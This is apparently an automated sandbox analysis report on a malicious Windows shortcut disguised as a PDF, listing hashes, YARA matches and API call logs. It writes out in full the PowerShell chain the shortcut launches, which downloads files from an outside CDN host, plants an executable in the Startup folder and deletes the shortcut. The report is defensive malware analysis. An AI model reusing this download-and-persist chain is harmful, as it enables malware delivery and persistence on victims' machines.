Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 24, 2023, 6 p.m.	Aug. 24, 2023, 6:02 p.m.

Size	5.0KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Wed May 11 00:09:09 2022, mtime=Tue Jan 31 20:11:32 2023, atime=Wed May 11 00:09:09 2022, length=452608, window=hidenormalshowminimized
MD5	`11926797c51a3317a8f749c3a48362d7`
SHA256	`e2bb87dc99e2c2ad5418b22e82a1e2df3e670c1865f418d9450600d423b4f64f`
CRC32	`FA871C4E`
ssdeep	`48:8oZuaFklOrnHBOrzq9qnqZ7S7fC4jMupHL3/dd0Y9XuHQBqiYLq4:8oZXsOjHBOn2IVzCiM2Hb/EY1um3YLq`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Antivirus - Contains references to security software Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IZFDLWw" C:\Users\test22\AppData\Local\Temp\Cabinet.pdf.lnk
2560
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';wget "https://kdrm201.b-cdn.net/xnt" -OutFile C:\Users\Public\Cab.pdf;Start-Process C:\Users\Public\Cab.pdf;$ProgressPreference = 'SilentlyContinue';wget "https://kdrm201.b-cdn.net/r" -OutFile "C:\ProgramData\p";move "C:\ProgramData\p" "C:\ProgramData\Winver.exe";wget "https://kdrm201.b-cdn.net/xnt" -OutFile C:\Users\Public\Cabinet.pdf;$pqr = Get-ChildItem -Path Env:APPDATA;$xyz = '\Microsoft\Windows\\"Start Menu"\Programs\Startup';$abc = $pqr.value+$xyz;Copy-Item C:\ProgramData\Winver.exe -Destination $abc;Start-Process C:\ProgramData\Winver.exe;cp -Path 'C:\Users\Public\Cabinet.pdf' -destination $pwd.Path;rm *f.l?k;
  2672

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 24, 2023, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2023, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2023, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2023, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2023, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2023, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 24, 2023, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2023, 6 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 24, 2023, 6 p.m.			0	0

Command line console output was observed (50 out of 127 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: The term 'wget' is not recognized as the name of a cmdlet, function, script fil console_handle: 0x00000023	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: e, or operable program. Check the spelling of the name, or if a path was includ console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: ed, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: At line:1 char:46 console_handle: 0x00000047	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: + $ProgressPreference = 'SilentlyContinue';wget <<<< https://kdrm201.b-cdn.net console_handle: 0x00000053	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: /xnt -OutFile C:\Users\Public\Cab.pdf;Start-Process C:\Users\Public\Cab.pdf;$Pr console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: ogressPreference = 'SilentlyContinue';wget https://kdrm201.b-cdn.net/r -OutFile console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: C:\ProgramData\p;move C:\ProgramData\p C:\ProgramData\Winver.exe;wget https:// console_handle: 0x00000077	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: kdrm201.b-cdn.net/xnt -OutFile C:\Users\Public\Cabinet.pdf;$pqr = Get-ChildItem console_handle: 0x00000083	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: -Path Env:APPDATA;$xyz = '\Microsoft\Windows\Start Menu\Programs\Startup';$abc console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: = $pqr.value+$xyz;Copy-Item C:\ProgramData\Winver.exe -Destination $abc;Start- console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: Process C:\ProgramData\Winver.exe;cp -Path 'C:\Users\Public\Cabinet.pdf' -desti console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: nation $pwd.Path;rm *f.l?k; console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: + CategoryInfo : ObjectNotFound: (wget:String) [], CommandNotFoun console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: dException console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x000000f7	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: nnot find the file specified. console_handle: 0x00000103	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: At line:1 char:123 console_handle: 0x0000010f	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: + $ProgressPreference = 'SilentlyContinue';wget https://kdrm201.b-cdn.net/xnt - console_handle: 0x0000011b	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: OutFile C:\Users\Public\Cab.pdf;Start-Process <<<< C:\Users\Public\Cab.pdf;$Pr console_handle: 0x00000127	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: ogressPreference = 'SilentlyContinue';wget https://kdrm201.b-cdn.net/r -OutFile console_handle: 0x00000133	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: C:\ProgramData\p;move C:\ProgramData\p C:\ProgramData\Winver.exe;wget https:// console_handle: 0x0000013f	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: kdrm201.b-cdn.net/xnt -OutFile C:\Users\Public\Cabinet.pdf;$pqr = Get-ChildItem console_handle: 0x0000014b	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: -Path Env:APPDATA;$xyz = '\Microsoft\Windows\Start Menu\Programs\Startup';$abc console_handle: 0x00000157	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: = $pqr.value+$xyz;Copy-Item C:\ProgramData\Winver.exe -Destination $abc;Start- console_handle: 0x00000163	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: Process C:\ProgramData\Winver.exe;cp -Path 'C:\Users\Public\Cabinet.pdf' -desti console_handle: 0x0000016f	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: nation $pwd.Path;rm *f.l?k; console_handle: 0x0000017b	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x00000187	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: erationException console_handle: 0x00000193	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x0000019f	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: ommands.StartProcessCommand console_handle: 0x000001ab	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: The term 'wget' is not recognized as the name of a cmdlet, function, script fil console_handle: 0x000001cb	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: e, or operable program. Check the spelling of the name, or if a path was includ console_handle: 0x000001d7	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: ed, verify that the path is correct and try again. console_handle: 0x000001e3	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: At line:1 char:193 console_handle: 0x000001ef	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: + $ProgressPreference = 'SilentlyContinue';wget https://kdrm201.b-cdn.net/xnt - console_handle: 0x000001fb	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: OutFile C:\Users\Public\Cab.pdf;Start-Process C:\Users\Public\Cab.pdf;$Progress console_handle: 0x00000077	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: Preference = 'SilentlyContinue';wget <<<< https://kdrm201.b-cdn.net/r -OutFile console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: C:\ProgramData\p;move C:\ProgramData\p C:\ProgramData\Winver.exe;wget https:// console_handle: 0x00000047	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: kdrm201.b-cdn.net/xnt -OutFile C:\Users\Public\Cabinet.pdf;$pqr = Get-ChildItem console_handle: 0x00000023	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: -Path Env:APPDATA;$xyz = '\Microsoft\Windows\Start Menu\Programs\Startup';$abc console_handle: 0x0000001b	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: = $pqr.value+$xyz;Copy-Item C:\ProgramData\Winver.exe -Destination $abc;Start- console_handle: 0x00000027	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: Process C:\ProgramData\Winver.exe;cp -Path 'C:\Users\Public\Cabinet.pdf' -desti console_handle: 0x0000003f	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: nation $pwd.Path;rm *f.l?k; console_handle: 0x00000057	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: + CategoryInfo : ObjectNotFound: (wget:String) [], CommandNotFoun console_handle: 0x00000063	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: dException console_handle: 0x0000007b	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000093	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: Move-Item : Cannot find path 'C:\ProgramData\p' because it does not exist. console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 24, 2023, 6 p.m.	buffer: At line:1 char:252 console_handle: 0x000000bf	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 53 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620a30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620a30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620a30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006208f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e6f88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e6f88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e6f88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e9ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ef148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ef148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ef148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ef148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ef148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ef148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ef148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 6 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ef148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 24, 2023, 6 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 148 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02950000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02752000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02763000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02764000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02792000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02765000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02766000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02793000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02794000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02795000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02796000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02797000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02798000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02799000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
